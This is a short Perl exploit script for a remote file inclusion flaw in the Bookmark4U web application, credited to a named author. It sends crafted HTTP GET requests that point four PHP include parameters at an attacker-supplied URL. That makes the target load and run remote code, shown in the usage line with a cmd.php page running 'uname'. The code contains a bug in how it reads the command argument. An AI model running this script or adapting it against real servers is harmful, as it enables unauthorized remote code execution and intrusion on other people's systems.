#!/usr/bin/perl
# Bookmark4U Multiple Remote File Include
#
# perl bm4u.pl <remote_addr> <remote_port> <remote_path> <cracked_page_cmd>
# Federico Fazzi <federico@autistici.org>

use IO::Socket;

if(@ARGV < 4) { &usage; }

my ($host, $port, $path, $cmd, $count);
my @includers = ("inc/dbase.php?env[include_prefix]=",
     "inc/config.php?env[include_prefix]=",
     "inc/common.php?env[include_prefix]=",
     "inc/function.php?env[include_prefix]=");

# hostname target
$host = $ARGV[0];
# port of hostname target
$port = $ARGV[1];
# path of bookmark4u
$path = $ARGV[2];

# url of cracker_cmd
$cmd = chomp($ARGV[3]);

for($count = 0; $count <=$#includers; $count++) {
  $socket = IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>"http($port)", Proto=>'tcp', Timeout=>'2');
  if($socket) {
    print "\ntry $path$includers[$count] string!\n";
    print $socket "GET ".$path."$includers[$count]".$cmd." HTTP/1.1\r\n";
      print $socket "Host: ".$host."\r\n";
      print $socket "Connection: close\r\n\r\n";
    print "sending request string.. done!\n\n";
    if(<$socket>) {
      print <$socket>;
    }
    close($socket);
  }
}

sub usage {
  print "Bookmark4U Multiple Remote File Include\n";
  print "\$ perl bm4u.pl 192.168.0.1 80 /[bookmark4u_path/
http://example/cmd.php?&cmd=uname\n";
  print "Federico Fazzi <federico@autistici.org>\n\n";
  exit(1);
}